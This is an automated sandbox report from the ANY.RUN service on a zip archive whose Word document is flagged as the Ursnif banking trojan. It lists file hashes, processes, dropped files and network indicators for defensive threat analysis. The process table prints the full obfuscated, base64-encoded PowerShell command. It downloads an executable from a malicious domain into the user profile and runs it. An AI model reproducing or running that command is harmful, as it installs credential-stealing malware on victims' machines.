analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Gioielleria_Gazzola.zip

Full analysis: https://app.any.run/tasks/cceb7afd-6e9b-4aad-a095-829cfe5224a8
Verdict: Malicious activity
Threats:

Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world.

Analysis date: May 24, 2019, 09:43:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
gozi
ursnif
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

40CF0BF03963B1E985971C9807993846

SHA1:

2B2E0A0A4831DC26FF3946D50E81E8B98D057AE2

SHA256:

576858B3F8E7CA1BB769C2CB873B2B4FC98C223C1F42730EEB39D10239830D54

SSDEEP:

1536:NesIkVHIt3gNaAnnXXCLaGiNXmgjsX8mH9y39CKsJCx74Gd:hIkVot3gNDyOXmgj88IK9xD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • URSNIF was detected

      • powershell.exe (PID: 3796)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 3320)
    • Creates files in the user directory

      • powershell.exe (PID: 3796)
    • Executed via WMI

      • powershell.exe (PID: 3796)
    • PowerShell script executed

      • powershell.exe (PID: 3796)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3840)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3840)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 2019:05:23 08:36:06
ZipCRC: 0xed203cfc
ZipCompressedSize: 65669
ZipUncompressedSize: 98368
ZipFileName: info_23.05.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs #URSNIF powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3320"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Gioielleria_Gazzola.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3840"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb3320.6899\info_23.05.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3796powershell -nop -e JABHAGIAbABhADYAMwB6AHcAPQAnAGYARQBBAEEATgBRACcAOwAkAGgANABZAFAARQByACAAPQAgACcAMgAxADQAJwA7ACQAYwB3AF8ANABtAFgAagA9ACcAbAA4ADkAagB1AE8AVQA3ACcAOwAkAEYAbgBDAEoAMQBPAFkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGgANABZAFAARQByACsAJwAuAGUAeABlACcAOwAkAEoAdgBOAFkAYgBNAD0AJwBQAG8AcABIAEMAWQAnADsAJABpAEUANAB6AEkAZABrADIAPQAmACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAJwArACcAYwB0ACcAKQAgAG4ARQBUAC4AVwBgAGUAQgBDAGAAbABpAEUAbgBUADsAJABLAGsAOQB6AEgAXwBsADEAPQAnAGgAdAB0AHAAOgAvAC8AcQB5AGgAYQBsAGwAZQA0ADQALgBjAG8AbQAvAGwAZQBnAG8AdQAvADMAcgBlAHQAeQB4AG8AMgBtAC4AcABoAHAAPwBsAD0AcwBwAGkAawBkADYALgB3AGEAcAAnAC4AcwBwAGwASQB0ACgAJwBAACcAKQA7ACQARQBJAGkAXwBEAFkAagA9ACcAWABFAEMAVQB6AHEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYATQBCAFEAdQBIAGMAVwAgAGkAbgAgACQASwBrADkAegBIAF8AbAAxACkAewB0AHIAeQB7ACQAaQBFADQAegBJAGQAawAyAC4ARABPAHcAbgBMAG8AYQBEAEYAaQBsAGUAKAAkAEYATQBCAFEAdQBIAGMAVwAsACAAJABGAG4AQwBKADEATwBZACkAOwAkAEIAaQB6AFUAYQBqAD0AJwBLAE4AcABNAGsANgBqAGMAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABGAG4AQwBKADEATwBZACkALgBMAGUAbgBHAHQASAAgAC0AZwBlACAAMgA1ADkAOQA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAFQAYQByAHQAKAAkAEYAbgBDAEoAMQBPAFkAKQA7ACQAVABfAEkAdwBMAFIAPQAnAEcAdQAxAGoAOQBXADMAQQAnADsAYgByAGUAYQBrADsAJABGAHEAawAzAEoAMgA9ACcAbQBkAGgAagBrAEMAbgBpACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHUAcgBvAEQARgBrAD0AJwBUAHMAcwAxAHQANQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 816
Read events
1 342
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
10

Dropped files

PID
Process
Filename
Type
3840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR488A.tmp.cvr
MD5:
SHA256:
3796powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OYZXFGG8OAOD1PMSCD31.temp
MD5:
SHA256:
3320WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb3320.6899\info_23.05.docflo
MD5:B7DE65CC9DEB74F38A8D7DAA9FA3F43F
SHA256:D9F03ED6F5D23BF07F3C450038D07588B4995AD91E511258FE6633D2ADC98055
3840WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C85BEB3B.wmfwmf
MD5:7239DD02F7A40B2FE26C78506061DD69
SHA256:0BE0896F864177C11E004AC22E3E9D327772D0C69B84FCAC3C411F9715A096A7
3840WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2657F3A2.wmfwmf
MD5:B03BD278279EBAA858AAEE0BFC2F4E97
SHA256:8C64EE410987B10B163A403F1E3F906D3CEB30FD732D5457FD9D73EBE5EF3819
3840WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A84DD2E5.wmfwmf
MD5:B10D2EFE40381CE0FE9C87783CCCA932
SHA256:FF396D9360702658D095FB927B9C39388211B05DE93FA59DBFEBD9BA0F71BD44
3840WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E1A974.wmfwmf
MD5:CE3FFBE526E51BE0669CB518C4D5644B
SHA256:D8D2130E0E46557DF9E11A9738AFBB3B96C257C337BA8B82DE6DBE2CB4ED6887
3840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:12A5F9738D54FD05E34118D101F345F9
SHA256:CE8AAD79C324985CAB1A9AB7059E9D219889A9C5D86B3B1319CA285BAB320A42
3840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIb3320.6899\~$fo_23.05.docpgc
MD5:C3DCF97818D4F4888C3CD88E3FDCA881
SHA256:78928B7986B5688E9E6AD397E52AD0254B473D91B303A539D0AC71D86FD3951C
3840WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:5FC549E254419DB7E637BEDEDE968980
SHA256:49FC2ADABF910202E59A9344F8B7B236F3C6605469816E4450D07DD1BEE8DF57
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3796
powershell.exe
GET
404
185.139.70.158:80
http://qyhalle44.com/legou/3retyxo2m.php?l=spikd6.wap
RO
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3796
powershell.exe
185.139.70.158:80
qyhalle44.com
Softkit SRL
RO
suspicious

DNS requests

Domain
IP
Reputation
qyhalle44.com
  • 185.139.70.158
malicious

Threats

PID
Process
Class
Message
3796
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MalDoc Requesting Ursnif Payload
1 ETPRO signatures available at the full report
No debug info